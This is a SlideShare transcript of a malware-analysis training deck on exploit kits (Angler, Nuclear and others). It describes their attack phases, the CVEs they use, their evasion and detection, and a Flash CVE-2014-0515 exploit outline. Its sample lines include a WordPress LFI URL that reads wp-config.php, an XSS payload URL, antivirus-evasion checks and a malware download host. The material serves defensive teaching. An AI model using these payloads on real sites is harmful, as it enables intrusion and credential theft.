SlideShare a Scribd company logo

Anatomy of Exploit Kits

Download as PPTX, PDF
securityxploded
securityxploded

The document provides an overview of exploit kits, including common exploit kit names (e.g. Fiesta, Angler), the phases of an exploit kit attack (compromised site, redirector, landing page, post-infection traffic), exploits used across browsers/plugins (e.g. IE, Java, Flash), evasion techniques (e.g. obfuscation), and includes a technical analysis of the CVE-2014-0515 Flash exploit.

Related slideshows

Advanced Malware Analysis Training Session 1 - Detection and Removal of Malwares
Advanced Malware Analysis Training Session 1 - Detection and Removal of MalwaresAdvanced Malware Analysis Training Session 1 - Detection and Removal of Malwares
Advanced Malware Analysis Training Session 1 - Detection and Removal of Malwares
 
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
 
Anti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and CountermeasuresAnti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and Countermeasures
 
1 of 24
Sameer Patil (sameerpatilms@gmail.com) SecurityXploded
  Exploit Kit Introduction  Phases  Exploits used  Access Filters  Detection  Analysis of exploits Content
  Fiesta  FlashPack  Magnitude  Rig  Nuclear  Angler  Sweet Orange  Neutrino Exploit Kits
 Exploit Kit Naming
  Compromised site  Redirector  Landing page  Post-infection traffic Phases
 LFI in RevSlider plugin of Wordpress  http://[compromised.com]/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php  XSS in Simple Security Wordpress plugin: CVE-2014-9570  http://[compromised.com]/wp- admin/users.php?page=access_log&datefilter=%27%22%3E%3 C script%3Ealert%28/HACKED/%29;%3C/script%3E  Drupal Sql Injection  CDN reference compromise (Eg. Operation Poisoned Helmand)  Iframe Injectors Compromised sites
 www.soyentrepreneur.com/assets/js/funcionesCarga.js Compromised sites
  www.media.orpi.com/js/scripts.js
 Redirector (Obfuscated)
 It checks if Silverlight plugin is installed by creating the following ActiveXObject object: ActiveXObject("AgControl.AgControl")  The presence of Flash plugin is ensured by creating the following object: swfobject.embedSWF()  Antivirus detection: if( chavs("kl1.sys") || chavs("tmciesc.sys") || chavs("tmtdi.sys") || chavs("tmactmon.sys") || chavs("TMEBC32.sys") || chavs("tmeext.sys") ||chavs("tmconn.sys") || chavs("tmevtmgr.sys") ) { exit(); } Redirector (after deobfuscating)
  Download from http://jxlpa.ianlar.in malicious files. Landing Page
  Banking Frauds  Spying  Information Stealing  Click Fraud activities Post-Infection


  IE- CVE-2014-0322(zero day), CVE-2014-0324(zero day), CVE-2014-6332, CVE-2013-2551, CVE-2013- 3918, CVE-2013-7331  Java- CVE-2013-2460, CVE-2013-2465, CVE-2012- 1723, CVE-2012-0507, CVE-2013-0422(zero day)  Flash- CVE-2014-8440, CVE-2014-0556, CVE-2014- 0569, CVE-2014-0515, CVE-2014-8439, CVE-2014- 0502(zero day), CVE-2015-????(zero day)  Silverlight- CVE-2013-0074, CVE-2013-3896  PDF- CVE-2010-0188 Exploits used
  Request with no referrer  Block IP addresses  Non-Windows traffic  User Agent access  Plugin-Detect scripts  URL blacklist checks Access Filters
  Obfuscation in JS  Signatures for specific CVEs  User Agent strings  URL patterns:  <domain>/index.php?req=mp3&num=37&PHPSSESID=  <domain>/index.php?req=swf&num=8413&PHPSSESID=  <domain>/index.php?req=xap&PHPSSESID=  <domain>/1.php?r Detection
  Java Exploit- CVE-2013-2465  Javascript deobfuscation Demo
  Vector<int> array of size 0x90 bytes  Vector size resized to 0 resulting in holes between vector objects  Vulnerability exploited  Memory Corruption  Spraying FileReference objects  Modify FileReference object function pointer table  cancel() is called -> call to VirtualProtect() Flash Exploit CVE-2014-0515
 Vector<Int> Object Memory Layout Source: HP security Blog

 DPBG tool
  CVE-2013-2465 Java Exploit  Java obfuscators  PixelBender Exploit  Malware don’t need Coffee  Malware Traffic Analysis References
 Thank You

More Related Content

Anatomy of Exploit Kits

  • 2.   Exploit Kit Introduction  Phases  Exploits used  Access Filters  Detection  Analysis of exploits Content
  • 3.   Fiesta  FlashPack  Magnitude  Rig  Nuclear  Angler  Sweet Orange  Neutrino Exploit Kits
  • 5.   Compromised site  Redirector  Landing page  Post-infection traffic Phases
  • 6.  LFI in RevSlider plugin of Wordpress  http://[compromised.com]/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php  XSS in Simple Security Wordpress plugin: CVE-2014-9570  http://[compromised.com]/wp- admin/users.php?page=access_log&datefilter=%27%22%3E%3 C script%3Ealert%28/HACKED/%29;%3C/script%3E  Drupal Sql Injection  CDN reference compromise (Eg. Operation Poisoned Helmand)  Iframe Injectors Compromised sites
  • 10.  It checks if Silverlight plugin is installed by creating the following ActiveXObject object: ActiveXObject("AgControl.AgControl")  The presence of Flash plugin is ensured by creating the following object: swfobject.embedSWF()  Antivirus detection: if( chavs("kl1.sys") || chavs("tmciesc.sys") || chavs("tmtdi.sys") || chavs("tmactmon.sys") || chavs("TMEBC32.sys") || chavs("tmeext.sys") ||chavs("tmconn.sys") || chavs("tmevtmgr.sys") ) { exit(); } Redirector (after deobfuscating)
  • 11.   Download from http://jxlpa.ianlar.in malicious files. Landing Page
  • 12.   Banking Frauds  Spying  Information Stealing  Click Fraud activities Post-Infection
  • 13.
  • 14.
  • 15.   IE- CVE-2014-0322(zero day), CVE-2014-0324(zero day), CVE-2014-6332, CVE-2013-2551, CVE-2013- 3918, CVE-2013-7331  Java- CVE-2013-2460, CVE-2013-2465, CVE-2012- 1723, CVE-2012-0507, CVE-2013-0422(zero day)  Flash- CVE-2014-8440, CVE-2014-0556, CVE-2014- 0569, CVE-2014-0515, CVE-2014-8439, CVE-2014- 0502(zero day), CVE-2015-????(zero day)  Silverlight- CVE-2013-0074, CVE-2013-3896  PDF- CVE-2010-0188 Exploits used
  • 16.   Request with no referrer  Block IP addresses  Non-Windows traffic  User Agent access  Plugin-Detect scripts  URL blacklist checks Access Filters
  • 17.   Obfuscation in JS  Signatures for specific CVEs  User Agent strings  URL patterns:  <domain>/index.php?req=mp3&num=37&PHPSSESID=  <domain>/index.php?req=swf&num=8413&PHPSSESID=  <domain>/index.php?req=xap&PHPSSESID=  <domain>/1.php?r Detection
  • 18.   Java Exploit- CVE-2013-2465  Javascript deobfuscation Demo
  • 19.   Vector<int> array of size 0x90 bytes  Vector size resized to 0 resulting in holes between vector objects  Vulnerability exploited  Memory Corruption  Spraying FileReference objects  Modify FileReference object function pointer table  cancel() is called -> call to VirtualProtect() Flash Exploit CVE-2014-0515
  • 20.  Vector<Int> Object Memory Layout Source: HP security Blog
  • 21.
  • 23.   CVE-2013-2465 Java Exploit  Java obfuscators  PixelBender Exploit  Malware don’t need Coffee  Malware Traffic Analysis References